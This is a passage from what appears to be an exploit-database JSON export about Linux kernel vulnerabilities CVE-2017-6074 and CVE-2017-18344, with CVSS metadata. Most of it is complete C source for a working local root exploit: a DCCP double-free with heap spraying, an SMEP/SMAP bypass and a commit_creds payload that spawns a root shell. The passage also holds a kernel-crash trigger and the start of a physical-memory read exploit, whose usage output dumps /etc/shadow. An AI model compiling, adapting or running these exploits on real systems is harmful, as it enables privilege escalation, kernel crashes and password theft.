"cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6074"], "modified": "2017-02-26T00:00:00", "id": "EXPLOITPACK:84D4B1F42D5DCA9623080EFFD17E58E1", "href": "", "sourceData": "//\n// EDB Note: More information ~ http://seclists.org/oss-sec/2017/q1/471\n//\n// A proof-of-concept local root exploit for CVE-2017-6074.\n// Includes a semireliable SMAP/SMEP bypass.\n// Tested on 4.4.0-62-generic #83-Ubuntu kernel.\n// https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-6074\n//\n// Usage:\n// $ gcc poc.c -o pwn\n// $ ./pwn\n// [.] namespace sandbox setup successfully\n// [.] disabling SMEP & SMAP\n// [.] scheduling 0xffffffff81064550(0x406e0)\n// [.] waiting for the timer to execute\n// [.] done\n// [.] SMEP & SMAP should be off now\n// [.] getting root\n// [.] executing 0x402043\n// [.] done\n// [.] should be root now\n// [.] checking if we got root\n// [+] got r00t ^_^\n// [!] don't kill the exploit binary, the kernel will crash\n// # cat /etc/shadow\n// ...\n// daemon:*:17149:0:99999:7:::\n// bin:*:17149:0:99999:7:::\n// sys:*:17149:0:99999:7:::\n// sync:*:17149:0:99999:7:::\n// games:*:17149:0:99999:7:::\n// ...\n//\n// Andrey Konovalov <andreyknvl@gmail.com>\n\n#define _GNU_SOURCE\n\n#include <errno.h>\n#include <fcntl.h>\n#include <stdarg.h>\n#include <stdbool.h>\n#include <stddef.h>\n#include <stdint.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n\n#include <sched.h>\n\n#include <sys/socket.h>\n#include <sys/syscall.h>\n#include <sys/types.h>\n#include <sys/wait.h>\n\n#include <arpa/inet.h>\n#include <linux/if_packet.h>\n#include <netinet/if_ether.h>\n\n#define SMEP_SMAP_BYPASS\t1\n\n// Needed for local root.\n#define COMMIT_CREDS\t\t0xffffffff810a2840L\n#define PREPARE_KERNEL_CRED\t0xffffffff810a2c30L\n#define SHINFO_OFFSET\t\t1728\n\n// Needed for SMEP_SMAP_BYPASS.\n#define NATIVE_WRITE_CR4\t0xffffffff81064550ul\n#define CR4_DESIRED_VALUE\t0x406e0ul\n#define TIMER_OFFSET\t\t(728 + 48 + 104)\n\n#define KMALLOC_PAD 128\n#define KMALLOC_WARM 32\n#define CATCH_FIRST 6\n#define CATCH_AGAIN 16\n#define CATCH_AGAIN_SMALL 64\n\n// Port is incremented on each use.\nstatic int port = 11000;\n\nvoid debug(const char *msg) {\n/*\n\tchar buffer[32];\n\tsnprintf(&buffer[0], sizeof(buffer), \"echo '%s' > /dev/kmsg\\n\", msg);\n\tsystem(buffer);\n*/\n}\n\n// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *\n\nstruct ubuf_info {\n\tuint64_t callback;\t\t// void (*callback)(struct ubuf_info *, bool)\n\tuint64_t ctx;\t\t\t// void *\n\tuint64_t desc;\t\t\t// unsigned long\n};\n\nstruct skb_shared_info {\n\tuint8_t nr_frags;\t\t// unsigned char\n\tuint8_t tx_flags;\t\t// __u8\n\tuint16_t gso_size;\t\t// unsigned short\n\tuint16_t gso_segs;\t\t// unsigned short\n\tuint16_t gso_type;\t\t// unsigned short\n\tuint64_t frag_list;\t\t// struct sk_buff *\n\tuint64_t hwtstamps;\t\t// struct skb_shared_hwtstamps\n\tuint32_t tskey;\t\t\t// u32\n\tuint32_t ip6_frag_id;\t\t// __be32\n\tuint32_t dataref;\t\t// atomic_t\n\tuint64_t destructor_arg;\t// void *\n\tuint8_t frags[16][17];\t\t// skb_frag_t frags[MAX_SKB_FRAGS];\n};\n\nstruct ubuf_info ui;\n\nvoid init_skb_buffer(char* buffer, void *func) {\n\tmemset(&buffer[0], 0, 2048);\n\n\tstruct skb_shared_info *ssi = (struct skb_shared_info *)&buffer[SHINFO_OFFSET];\n\n\tssi->tx_flags = 0xff;\n\tssi->destructor_arg = (uint64_t)&ui;\n\tssi->nr_frags = 0;\n\tssi->frag_list = 0;\n\n\tui.callback = (unsigned long)func;\n}\n\nstruct timer_list {\n\tvoid\t\t*next;\n\tvoid\t\t*prev;\n\tunsigned long\texpires;\n\tvoid\t\t(*function)(unsigned long);\n\tunsigned long\tdata;\n\tunsigned int\tflags;\n\tint\t\tslack;\n};\n\nvoid init_timer_buffer(char* buffer, void *func, unsigned long arg) {\n\tmemset(&buffer[0], 0, 2048);\n\n\tstruct timer_list* timer = (struct timer_list *)&buffer[TIMER_OFFSET];\n\n\ttimer->next = 0;\n\ttimer->prev = 0;\n\ttimer->expires = 4294943360;\n\ttimer->function = func;\n\ttimer->data = arg;\n\ttimer->flags = 1;\n\ttimer->slack = -1;\n}\n\n// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *\n\nstruct dccp_handle {\n\tstruct sockaddr_in6 sa;\n\tint s1;\n\tint s2;\n};\n\nvoid dccp_init(struct dccp_handle *handle, int port) {\n\thandle->sa.sin6_family = AF_INET6;\n\thandle->sa.sin6_port = htons(port);\n\tinet_pton(AF_INET6, \"::1\", &handle->sa.sin6_addr);\n\thandle->sa.sin6_flowinfo = 0;\n\thandle->sa.sin6_scope_id = 0;\n\n\thandle->s1 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);\n\tif (handle->s1 == -1) {\n\t\tperror(\"socket(SOCK_DCCP)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tint rv = bind(handle->s1, &handle->sa, sizeof(handle->sa));\n\tif (rv != 0) {\n\t\tperror(\"bind()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\trv = listen(handle->s1, 0x9);\n\tif (rv != 0) {\n\t\tperror(\"listen()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tint optval = 8;\n\trv = setsockopt(handle->s1, IPPROTO_IPV6, IPV6_RECVPKTINFO,\n\t\t\t&optval, sizeof(optval));\n\tif (rv != 0) {\n\t\tperror(\"setsockopt(IPV6_RECVPKTINFO)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\thandle->s2 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);\n\tif (handle->s1 == -1) {\n\t\tperror(\"socket(SOCK_DCCP)\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\nvoid dccp_kmalloc_kfree(struct dccp_handle *handle) {\n\tint rv = connect(handle->s2, &handle->sa, sizeof(handle->sa));\n\tif (rv != 0) {\n\t\tperror(\"connect(SOCK_DCCP)\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\nvoid dccp_kfree_again(struct dccp_handle *handle) {\n\tint rv = shutdown(handle->s1, SHUT_RDWR);\n\tif (rv != 0) {\n\t\tperror(\"shutdown(SOCK_DCCP)\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\nvoid dccp_destroy(struct dccp_handle *handle) {\n\tclose(handle->s1);\n\tclose(handle->s2);\n}\n\n// * * * * * * * * * * * * * * Heap spraying * * * * * * * * * * * * * * * * *\n\nstruct udp_fifo_handle {\n\tint fds[2];\n};\n\nvoid udp_fifo_init(struct udp_fifo_handle* handle) {\n\tint rv = socketpair(AF_LOCAL, SOCK_DGRAM, 0, handle->fds);\n\tif (rv != 0) {\n\t\tperror(\"socketpair()\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\nvoid udp_fifo_destroy(struct udp_fifo_handle* handle) {\n\tclose(handle->fds[0]);\n\tclose(handle->fds[1]);\n}\n\nvoid udp_fifo_kmalloc(struct udp_fifo_handle* handle, char *buffer) {\n\tint rv = send(handle->fds[0], buffer, 1536, 0);\n\tif (rv != 1536) {\n\t\tperror(\"send()\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\nvoid udp_fifo_kmalloc_small(struct udp_fifo_handle* handle) {\n\tchar buffer[128];\n\tint rv = send(handle->fds[0], &buffer[0], 128, 0);\n\tif (rv != 128) {\n\t\tperror(\"send()\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\nvoid udp_fifo_kfree(struct udp_fifo_handle* handle) {\n \tchar buffer[2048];\n\tint rv = recv(handle->fds[1], &buffer[0], 1536, 0);\n\tif (rv != 1536) {\n\t\tperror(\"recv()\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\nint timer_kmalloc() {\n\tint s = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));\n\tif (s == -1) {\n\t\tperror(\"socket(SOCK_DGRAM)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\treturn s;\n}\n\n#define CONF_RING_FRAMES 1\nvoid timer_schedule(int handle, int timeout) {\n\tint optval = TPACKET_V3;\n\tint rv = setsockopt(handle, SOL_PACKET, PACKET_VERSION,\n\t\t\t&optval, sizeof(optval));\n\tif (rv != 0) {\n\t\tperror(\"setsockopt(PACKET_VERSION)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\tstruct tpacket_req3 tp;\n\tmemset(&tp, 0, sizeof(tp));\n\ttp.tp_block_size = CONF_RING_FRAMES * getpagesize();\n\ttp.tp_block_nr = 1;\n\ttp.tp_frame_size = getpagesize();\n\ttp.tp_frame_nr = CONF_RING_FRAMES;\n\ttp.tp_retire_blk_tov = timeout;\n\trv = setsockopt(handle, SOL_PACKET, PACKET_RX_RING,\n\t\t\t(void *)&tp, sizeof(tp));\n\tif (rv != 0) {\n\t\tperror(\"setsockopt(PACKET_RX_RING)\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\nvoid socket_sendmmsg(int sock, char *buffer) {\n\tstruct mmsghdr msg[1];\n\n\tmsg[0].msg_hdr.msg_iovlen = 0;\n\n\t// Buffer to kmalloc.\n\tmsg[0].msg_hdr.msg_control = &buffer[0];\n\tmsg[0].msg_hdr.msg_controllen = 2048;\n\n\t// Make sendmmsg exit easy with EINVAL.\n\tmsg[0].msg_hdr.msg_name = \"root\";\n\tmsg[0].msg_hdr.msg_namelen = 1;\n\n\tint rv = syscall(__NR_sendmmsg, sock, msg, 1, 0);\n\tif (rv == -1 && errno != EINVAL) {\n\t\tperror(\"[-] sendmmsg()\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\nvoid sendmmsg_kmalloc_kfree(int port, char *buffer) {\n\tint sock[2];\n\n\tint rv = socketpair(AF_LOCAL, SOCK_DGRAM, 0, sock);\n\tif (rv != 0) {\n\t\tperror(\"socketpair()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tsocket_sendmmsg(sock[0], buffer);\n\n\tclose(sock[0]);\n}\n\n// * * * * * * * * * * * * * * Heap warming * * * * * * * * * * * * * * * * *\n\nvoid dccp_connect_pad(struct dccp_handle *handle, int port) {\n\thandle->sa.sin6_family = AF_INET6;\n\thandle->sa.sin6_port = htons(port);\n\tinet_pton(AF_INET6, \"::1\", &handle->sa.sin6_addr);\n\thandle->sa.sin6_flowinfo = 0;\n\thandle->sa.sin6_scope_id = 0;\n\n\thandle->s1 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);\n\tif (handle->s1 == -1) {\n\t\tperror(\"socket(SOCK_DCCP)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tint rv = bind(handle->s1, &handle->sa, sizeof(handle->sa));\n\tif (rv != 0) {\n\t\tperror(\"bind()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\trv = listen(handle->s1, 0x9);\n\tif (rv != 0) {\n\t\tperror(\"listen()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\thandle->s2 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);\n\tif (handle->s1 == -1) {\n\t\tperror(\"socket(SOCK_DCCP)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\trv = connect(handle->s2, &handle->sa, sizeof(handle->sa));\n\tif (rv != 0) {\n\t\tperror(\"connect(SOCK_DCCP)\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\nvoid dccp_kmalloc_pad() {\n\tint i;\n\tstruct dccp_handle handle;\n\tfor (i = 0; i < 4; i++) {\n\t\tdccp_connect_pad(&handle, port++);\n\t}\n}\n\nvoid timer_kmalloc_pad() {\n\tint i;\n\tfor (i = 0; i < 4; i++) {\n\t\tsocket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));\n\t}\n}\n\nvoid udp_kmalloc_pad() {\n\tint i, j;\n\tchar dummy[2048];\n\tstruct udp_fifo_handle uh[16];\n\tfor (i = 0; i < KMALLOC_PAD / 16; i++) {\n\t\tudp_fifo_init(&uh[i]);\n\t\tfor (j = 0; j < 16; j++)\n\t\t\tudp_fifo_kmalloc(&uh[i], &dummy[0]);\n\t}\n}\n\nvoid kmalloc_pad() {\n\tdebug(\"dccp kmalloc pad\");\n\tdccp_kmalloc_pad();\n\tdebug(\"timer kmalloc pad\");\n\ttimer_kmalloc_pad();\n\tdebug(\"udp kmalloc pad\");\n\tudp_kmalloc_pad();\n}\n\nvoid udp_kmalloc_warm() {\n\tint i, j;\n\tchar dummy[2048];\n\tstruct udp_fifo_handle uh[16];\n\tfor (i = 0; i < KMALLOC_WARM / 16; i++) {\n\t\tudp_fifo_init(&uh[i]);\n\t\tfor (j = 0; j < 16; j++)\n\t\t\tudp_fifo_kmalloc(&uh[i], &dummy[0]);\n\t}\n\tfor (i = 0; i < KMALLOC_WARM / 16; i++) {\n\t\tfor (j = 0; j < 16; j++)\n\t\t\tudp_fifo_kfree(&uh[i]);\n\t}\n}\n\nvoid kmalloc_warm() {\n\tudp_kmalloc_warm();\n}\n\n// * * * * * * * * * * * * * Disabling SMEP/SMAP * * * * * * * * * * * * * * *\n\n// Executes func(arg) from interrupt context multiple times.\nvoid kernel_exec_irq(void *func, unsigned long arg) {\n\tint i;\n\tstruct dccp_handle dh;\n\tstruct udp_fifo_handle uh1, uh2, uh3, uh4;\n\tchar dummy[2048];\n\tchar buffer[2048];\n\n\tprintf(\"[.] scheduling %p(%p)\\n\", func, (void *)arg);\n\n\tmemset(&dummy[0], 0xc3, 2048);\n\tinit_timer_buffer(&buffer[0], func, arg);\n\n\tudp_fifo_init(&uh1);\n\tudp_fifo_init(&uh2);\n\tudp_fifo_init(&uh3);\n\tudp_fifo_init(&uh4);\n\n\tdebug(\"kmalloc pad\");\n\tkmalloc_pad();\n\n\tdebug(\"kmalloc warm\");\n\tkmalloc_warm();\n\n\tdebug(\"dccp init\");\n\tdccp_init(&dh, port++);\n\n\tdebug(\"dccp kmalloc kfree\");\n\tdccp_kmalloc_kfree(&dh);\n\n\tdebug(\"catch 1\");\n\tfor (i = 0; i < CATCH_FIRST; i++)\n\t\tudp_fifo_kmalloc(&uh1, &dummy[0]);\n\n\tdebug(\"dccp kfree again\");\n\tdccp_kfree_again(&dh);\n\n\tdebug(\"catch 2\");\n\tfor (i = 0; i < CATCH_FIRST; i++)\n\t\tudp_fifo_kmalloc(&uh2, &dummy[0]);\n\n\tint timers[CATCH_FIRST];\n\tdebug(\"catch 1 -> timer\");\n\tfor (i = 0; i < CATCH_FIRST; i++) {\n\t\tudp_fifo_kfree(&uh1);\n\t\ttimers[i] = timer_kmalloc();\n\t}\n\n\tdebug(\"catch 1 small\");\n\tfor (i = 0; i < CATCH_AGAIN_SMALL; i++)\n\t\tudp_fifo_kmalloc_small(&uh4);\n\n\tdebug(\"schedule timers\");\n\tfor (i = 0; i < CATCH_FIRST; i++)\n\t\ttimer_schedule(timers[i], 500);\n\n\tdebug(\"catch 2 -> overwrite timers\");\n\tfor (i = 0; i < CATCH_FIRST; i++) {\n\t\tudp_fifo_kfree(&uh2);\n\t\tudp_fifo_kmalloc(&uh3, &buffer[0]);\n\t}\n\n\tdebug(\"catch 2 small\");\n\tfor (i = 0; i < CATCH_AGAIN_SMALL; i++)\n\t\tudp_fifo_kmalloc_small(&uh4);\n\n\tprintf(\"[.] waiting for the timer to execute\\n\");\n\n\tdebug(\"wait\");\n\tsleep(1);\n\n\tprintf(\"[.] done\\n\");\n}\n\nvoid disable_smep_smap() {\n\tprintf(\"[.] disabling SMEP & SMAP\\n\");\n\tkernel_exec_irq((void *)NATIVE_WRITE_CR4, CR4_DESIRED_VALUE);\n\tprintf(\"[.] SMEP & SMAP should be off now\\n\");\n}\n\n// * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * * *\n\n// Executes func() from process context.\nvoid kernel_exec(void *func) {\n\tint i;\n\tstruct dccp_handle dh;\n\tstruct udp_fifo_handle uh1, uh2, uh3;\n\tchar dummy[2048];\n\tchar buffer[2048];\n\n\tprintf(\"[.] executing %p\\n\", func);\n\n\tmemset(&dummy[0], 0, 2048);\n\tinit_skb_buffer(&buffer[0], func);\n\n\tudp_fifo_init(&uh1);\n\tudp_fifo_init(&uh2);\n\tudp_fifo_init(&uh3);\n\n\tdebug(\"kmalloc pad\");\n\tkmalloc_pad();\n\n\tdebug(\"kmalloc warm\");\n\tkmalloc_warm();\n\n\tdebug(\"dccp init\");\n\tdccp_init(&dh, port++);\n\n\tdebug(\"dccp kmalloc kfree\");\n\tdccp_kmalloc_kfree(&dh);\n\n\tdebug(\"catch 1\");\n\tfor (i = 0; i < CATCH_FIRST; i++)\n\t\tudp_fifo_kmalloc(&uh1, &dummy[0]);\n\n\tdebug(\"dccp kfree again:\");\n\tdccp_kfree_again(&dh);\n\n\tdebug(\"catch 2\");\n\tfor (i = 0; i < CATCH_FIRST; i++)\n\t\tudp_fifo_kmalloc(&uh2, &dummy[0]);\n\n\tdebug(\"catch 1 -> overwrite\");\n\tfor (i = 0; i < CATCH_FIRST; i++) {\n\t\tudp_fifo_kfree(&uh1);\n\t\tsendmmsg_kmalloc_kfree(port++, &buffer[0]);\n\t}\n\tdebug(\"catch 2 -> free & trigger\");\n\tfor (i = 0; i < CATCH_FIRST; i++)\n\t\tudp_fifo_kfree(&uh2);\n\n\tdebug(\"catch 1 & 2\");\n\tfor (i = 0; i < CATCH_AGAIN; i++)\n\t\tudp_fifo_kmalloc(&uh3, &dummy[0]);\n\n\tprintf(\"[.] done\\n\");\n}\n\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\n\n_commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;\n_prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED;\n\nvoid get_root_payload(void) {\n\tcommit_creds(prepare_kernel_cred(0));\n}\n\nvoid get_root() {\n\tprintf(\"[.] getting root\\n\");\n\tkernel_exec(&get_root_payload);\n\tprintf(\"[.] should be root now\\n\");\n}\n\n// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *\n\nvoid exec_shell() {\n\tchar *shell = \"/bin/bash\";\n\tchar *args[] = {shell, \"-i\", NULL};\n\texecve(shell, args, NULL);\n}\n\nvoid fork_shell() {\n\tpid_t rv;\n\n\trv = fork();\n\tif (rv == -1) {\n\t\tperror(\"fork()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tif (rv == 0) {\n\t\texec_shell();\n\t}\n}\n\nbool is_root() {\n\t// We can't simple check uid, since we're running inside a namespace\n\t// with uid set to 0. Try opening /etc/shadow instead.\n\tint fd = open(\"/etc/shadow\", O_RDONLY);\n\tif (fd == -1)\n\t\treturn false;\n\tclose(fd);\n\treturn true;\n}\n\nvoid check_root() {\n\tprintf(\"[.] checking if we got root\\n\");\n\n\tif (!is_root()) {\n\t\tprintf(\"[-] something went wrong =(\\n\");\n\t\tprintf(\"[!] don't kill the exploit binary, the kernel will crash\\n\");\n\t\treturn;\n\t}\n\n\tprintf(\"[+] got r00t ^_^\\n\");\n\tprintf(\"[!] don't kill the exploit binary, the kernel will crash\\n\");\n\n\t// Fork and exec instead of just doing the exec to avoid freeing\n\t// skbuffs and prevent crashes due to a allocator corruption.\n\tfork_shell();\n}\n\nstatic bool write_file(const char* file, const char* what, ...)\n{\n\tchar buf[1024];\n\tva_list args;\n\tva_start(args, what);\n\tvsnprintf(buf, sizeof(buf), what, args);\n\tva_end(args);\n\tbuf[sizeof(buf) - 1] = 0;\n\tint len = strlen(buf);\n\n\tint fd = open(file, O_WRONLY | O_CLOEXEC);\n\tif (fd == -1)\n\t\treturn false;\n\tif (write(fd, buf, len) != len) {\n\t\tclose(fd);\n\t\treturn false;\n\t}\n\tclose(fd);\n\treturn true;\n}\n\nvoid setup_sandbox() {\n\tint real_uid = getuid();\n\tint real_gid = getgid();\n\n if (unshare(CLONE_NEWUSER) != 0) {\n\t\tperror(\"unshare(CLONE_NEWUSER)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n if (unshare(CLONE_NEWNET) != 0) {\n\t\tperror(\"unshare(CLONE_NEWUSER)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tif (!write_file(\"/proc/self/setgroups\", \"deny\")) {\n\t\tperror(\"write_file(/proc/self/set_groups)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\tif (!write_file(\"/proc/self/uid_map\", \"0 %d 1\\n\", real_uid)){\n\t\tperror(\"write_file(/proc/self/uid_map)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\tif (!write_file(\"/proc/self/gid_map\", \"0 %d 1\\n\", real_gid)) {\n\t\tperror(\"write_file(/proc/self/gid_map)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tcpu_set_t my_set;\n\tCPU_ZERO(&my_set);\n\tCPU_SET(0, &my_set);\n\tif (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {\n\t\tperror(\"sched_setaffinity()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tif (system(\"/sbin/ifconfig lo up\") != 0) {\n\t\tperror(\"system(/sbin/ifconfig lo up)\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tprintf(\"[.] namespace sandbox setup successfully\\n\");\n}\n\nint main() {\n\tsetup_sandbox();\n\n#if SMEP_SMAP_BYPASS\n\tdisable_smep_smap();\n#endif\n\n\tget_root();\n\n\tcheck_root();\n\n\twhile (true) {\n\t\tsleep(100);\n\t}\n\n\treturn 0;\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:28", "description": "\nLinux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free (PoC)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-02-26T00:00:00", "type": "exploitpack", "title": "Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free (PoC)", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6074"], "modified": "2017-02-26T00:00:00", "id": "EXPLOITPACK:4EEB4BE9E101A3B6E5FA4A3FC9B06CCD", "href": "", "sourceData": "//\n// EDB Note: More information ~ http://seclists.org/oss-sec/2017/q1/471\n//\n// A trigger for CVE-2017-6074, crashes kernel.\n// Tested on 4.4.0-62-generic #83-Ubuntu kernel.\n// https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-6074\n//\n// Andrey Konovalov <andreyknvl@gmail.com>\n\n#define _GNU_SOURCE\n\n#include <netinet/ip.h>\n\n#include <sys/ioctl.h>\n#include <sys/mman.h>\n#include <sys/socket.h>\n#include <sys/stat.h>\n#include <sys/syscall.h>\n#include <sys/types.h>\n\n#include <stdarg.h>\n#include <stdbool.h>\n#include <stddef.h>\n#include <stdint.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n\n#include <arpa/inet.h>\n\nint main() {\n\tstruct sockaddr_in6 sa1;\n\tsa1.sin6_family = AF_INET6;\n\tsa1.sin6_port = htons(20002);\n\tinet_pton(AF_INET6, \"::1\", &sa1.sin6_addr);\n\tsa1.sin6_flowinfo = 0;\n\tsa1.sin6_scope_id = 0;\n\t\t\n\tint optval = 8;\n\n\tint s1 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);\n\tbind(s1, &sa1, 0x20);\n\tlisten(s1, 0x9);\n\n\tsetsockopt(s1, IPPROTO_IPV6, IPV6_RECVPKTINFO, &optval, 4);\n\n\tint s2 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);\n\tconnect(s2, &sa1, 0x20);\n\n\tshutdown(s1, SHUT_RDWR);\n\tclose(s1);\n\tshutdown(s2, SHUT_RDWR);\n\tclose(s2);\n\n\treturn 0;\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2018-08-11T09:54:16", "description": "", "cvss3": {}, "published": "2018-08-09T00:00:00", "type": "packetstorm", "title": "Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) Arbitrary File Read", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-18344"], "modified": "2018-08-09T00:00:00", "id": "PACKETSTORM:148867", "href": "https://packetstormsecurity.com/files/148867/Linux-Kernel-4.14.7-Ubuntu-16.04-CentOS-7-Arbitrary-File-Read.html", "sourceData": "`// A proof-of-concept exploit for CVE-2017-18344. \n// Includes KASLR and SMEP bypasses. No SMAP bypass. \n// No support for 1 GB pages or 5 level page tables. \n// Tested on Ubuntu xenial 4.4.0-116-generic and 4.13.0-38-generic \n// and on CentOS 7 3.10.0-862.9.1.el7.x86_64. \n// \n// gcc pwn.c -o pwn \n// \n// $ ./pwn search 'root:!:' \n// [.] setting up proc reader \n// [~] done \n// [.] checking /proc/cpuinfo \n// [~] looks good \n// [.] setting up timer \n// [~] done \n// [.] finding leak pointer address \n// [+] done: 000000022ca45b60 \n// [.] mapping leak pointer page \n// [~] done \n// [.] divide_error: ffffffffad6017b0 \n// [.] kernel text: ffffffffacc00000 \n// [.] page_offset_base: ffffffffade48a90 \n// [.] physmap: ffff8d40c0000000 \n// [.] task->mm->pgd: ffffffffade0a000 \n// [.] searching [0000000000000000, 00000000f524d000) for 'root:!:': \n// [.] now at 0000000000000000 \n// [.] now at 0000000002000000 \n// [.] now at 0000000004000000 \n// ... \n// [.] now at 000000008c000000 \n// [.] now at 000000008e000000 \n// [.] now at 0000000090000000 \n// [+] found at 0000000090ff3000 \n// [+] done \n// \n// $ ./pwn phys 0000000090ff3000 1000 shadow \n// [.] setting up proc reader \n// [~] done \n// [.] checking /proc/cpuinfo \n// [~] looks good \n// [.] setting up timer \n// [~] done \n// [.] finding leak pointer address \n// [+] done: 000000022ca45b60 \n// [.] mapping leak pointer page \n// [~] done \n// [.] divide_error: ffffffffad6017b0 \n// [.] kernel text: ffffffffacc00000 \n// [.] page_offset_base: ffffffffade48a90 \n// [.] physmap: ffff8d40c0000000 \n// [.] task->mm->pgd: ffffffffade0a000 \n// [.] dumping physical memory [0000000090ff3000, 0000000090ff4000): \n// [+] done \n// \n// $ cat shadow \n// root:!:17612:0:99999:7::: \n// daemon:*:17590:0:99999:7::: \n// bin:*:17590:0:99999:7::: \n// ... \n// saned:*:17590:0:99999:7::: \n// usbmux:*:17590:0:99999:7::: \n// user:$1$7lXXXXSv$rvXXXXXXXXXXXXXXXXXhr/:17612:0:99999:7::: \n// \n// Andrey Konovalov <andreyknvl@gmail.com> \n \n#define _GNU_SOURCE \n \n#include <assert.h> \n#include <ctype.h> \n#include <fcntl.h> \n#include <signal.h> \n#include <stdarg.h> \n#include <stdbool.h> \n#include <stdint.h> \n#include <stdio.h> \n#include <stdlib.h> \n#include <string.h> \n#include <time.h> \n#include <unistd.h> \n \n#include <sys/ioctl.h> \n#include <sys/mman.h> \n#include <sys/stat.h> \n#include <sys/sysinfo.h> \n#include <sys/syscall.h> \n#include <sys/types.h> \n \n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \n \n#define DEBUG 0 \n \n// CentOS 7 3.10.0-862.9.1.el7.x86_64 \n#define KERNEL_START 0xffffffff81000000ul \n#define O_DIVIDE_ERROR (0xffffffff81723a40ul - KERNEL_START) \n#define O_INIT_TASK (0xffffffff81c16480ul - KERNEL_START) \n#define O_INIT_MM (0xffffffff81c914a0ul - KERNEL_START) \n#define O_PAGE_OFFSET_BASE (0xffffffff81c41440ul - KERNEL_START) \n#define O_TASK_STRUCT_TASKS 1072 \n#define O_TASK_STRUCT_MM 1128 \n#define O_TASK_STRUCT_PID 1188 \n#define O_MM_STRUCT_MMAP 0 \n#define O_MM_STRUCT_PGD 88 \n#define O_VM_AREA_STRUCT_VM_START 0 \n#define O_VM_AREA_STRUCT_VM_END 8 \n#define O_VM_AREA_STRUCT_VM_NEXT 16 \n#define O_VM_AREA_STRUCT_VM_FLAGS 80 \n \n#if 0 \n// Ubuntu xenial 4.4.0-116-generic \n#define KERNEL_START 